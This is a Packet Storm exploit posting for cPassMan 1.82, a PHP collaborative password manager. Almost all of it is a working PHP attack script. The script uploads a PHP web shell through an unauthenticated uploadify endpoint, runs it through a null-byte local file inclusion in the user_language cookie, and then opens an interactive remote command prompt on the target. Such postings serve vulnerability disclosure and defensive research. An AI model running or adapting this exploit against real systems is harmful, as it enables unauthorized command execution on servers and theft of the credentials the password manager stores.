cPassMan 1.82 Remote Command Execution

2012-02-25T00:00:00
ID PACKETSTORM:110222
Type packetstorm
Reporter ls
Modified 2012-02-25T00:00:00

Description

                                        
                                            `Product. Collaborative Passwords Manager (cPassMan)  
Platform. Independent (PHP)  
Affected versions. 1.82  
<?php  
/*  
* cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)  
* Disclaimer: cPassMan developer was notified of vulnerabilities in April 2011 and advised that v1.x was no longer supported.  
* Note: Requires PHP 5.3.3 or lower due to the use of a poison null byte in the LFI.  
*/  
if ($argc < 3) {  
print "Usage: php -f {$argv[0]} <host> <path> (e.g. php -f {$argv[0]} 192.168.129.130 /cpassman)\n";  
exit();  
}  
print "--------------------------------------------------------------------------------\n";  
print "cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)\n";  
print "--------------------------------------------------------------------------------\n";  
$host = $argv[1];  
$path = $argv[2];  
$port = 80;  
/*  
* Stage One: Unauthenticated Arbitrary File Upload  
* Uploaded files are stored in the document root of the web server as a file with the MD5 hash of the original filename.  
*/  
print "[*] Stage One: Uploading command execution handler... ";  
$upload_path = $path . "/includes/libraries/uploadify/uploadify.php";  
$fp = fsockopen($host, $port, $errno, $errstr, 30);  
if ($fp) {  
fputs($fp, "POST $upload_path HTTP/1.1\r\n");  
fputs($fp, "Host: $host\r\n");  
fputs($fp, "Content-Type: multipart/form-data; boundary=---------------------------4827543632391\r\n");  
fputs($fp, "Content-Length: 233\r\n\r\n");  
fputs($fp, "-----------------------------4827543632391\r\n");  
fputs($fp, "Content-Disposition: form-data; name=\"Filedata\"; filename=\"rabbit.txt\";\r\n");  
fputs($fp, "Content-Type: text/plain\r\n\r\n");  
fputs($fp, "<?php echo system(\$_GET['z']); die(); ?>\r\n");  
fputs($fp, "-----------------------------4827543632391--\r\n\r\n");  
$result = fgets($fp, 16);  
fclose($fp);  
}  
if (strstr($result, "200 OK")) {  
print "Success!\n";  
}  
/*  
* Stage Two: Local File Inclusion  
* Several LFI vulnerabilities exist in the user language selection functionality. The exploit uses the user_language cookie attack vector.  
*/  
print "[*] Stage Two: Confirming command execution via local file inclusion... ";  
$cmd = "echo rabbit";  
$success = FALSE;  
$stdin = fopen("php://stdin","r");  
do {  
$cmd = str_replace(" ", "+", $cmd);  
$lfi_path = $path . "/index.php?z=" . $cmd;  
$fp = fsockopen($host, $port, $errno, $errstr, 30);  
if ($fp) {  
fputs($fp, "GET $lfi_path HTTP/1.1\r\n");  
fputs($fp, "Host: 192.168.129.130\r\n");  
fputs($fp, "Cookie: user_language=../../../89f84a8775dd8f60cdbdef0d73919511%00\r\n");  
fputs($fp, "Content-Length: 0\r\n\r\n");  
for ($i = 0; $i < 13; $i++) {  
fgets($fp, 2048);  
}  
$output = "\n";  
while (($tmp = fgets($fp, 2048)) != FALSE && !feof($fp)) {  
$output .= $tmp;  
}  
if ($success) {  
echo $output;  
}  
fclose($fp);  
}  
if (!$success && strstr($output, "rabbit")) {  
$success = TRUE;  
print "Success!\n";  
}  
print "\n> ";  
} while ($cmd = trim(fgets($stdin)));  
?>  
  
  
`